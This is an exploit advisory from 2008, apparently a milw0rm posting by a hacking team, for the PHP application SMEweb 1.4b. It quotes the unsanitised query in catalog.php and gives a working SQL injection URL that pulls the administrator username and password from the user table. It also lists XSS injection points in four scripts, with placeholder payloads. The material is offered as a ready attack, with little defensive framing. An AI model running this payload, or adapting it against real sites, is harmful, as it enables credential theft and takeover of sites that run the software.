Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19978
HistoryJun 05, 2008 - 12:00 a.m.

SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

2008-06-0500:00:00
vulners.com
101

=======================================================
SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

,–^----------,--------,-----,-------^–,
| ||||||||| `--------' | O … CWH Underground Hacking Team …
`±--------------------------^----------|
`\_,-------, ___________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\
(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

AUTHOR : CWH Underground
DATE : 2 June 2008
SITE : www.citec.us

#####################################################
APPLICATION : SMEweb
VERSION : 1.4b
VENDOR : http://www.smethailand.com/
DOWNLOAD : http://www.geocities.com/smes_thailand/smeweb_v14b.zip
#####################################################

—SQL Injection Exploit—

##############################################
Vulnerable: catalog.php (Line:66-69)

if($idp)
$sql = "select * from ".$fix."catalog where idp='$idp' and category NOT IN ('L1','LA') ";
elseif($category)
$sql = "select * from ".$fix."catalog where category='$category' order by idp desc limit 1";

$result = mysql_db_query($dbname,$sql);
###############################################

It's Work with Magic_quote must turn off

http://[target]/[path]/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1
ORDER BY counter/*

—Multiple Remote XSS Exploit—

[+]catalog.php
[+]search.php
[+]bb.php
[+]order.php

Example:

http://[target]/[path]/catalog.php?data=<XSS>
http://[target]/[path]/search.php?keyword=<XSS>
http://[target]/[path]/bb.php?page=<XSS>
http://[target]/[path]/order.php?new_s=<XSS>

##################################################################

Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

##################################################################

milw0rm.com [2008-06-02]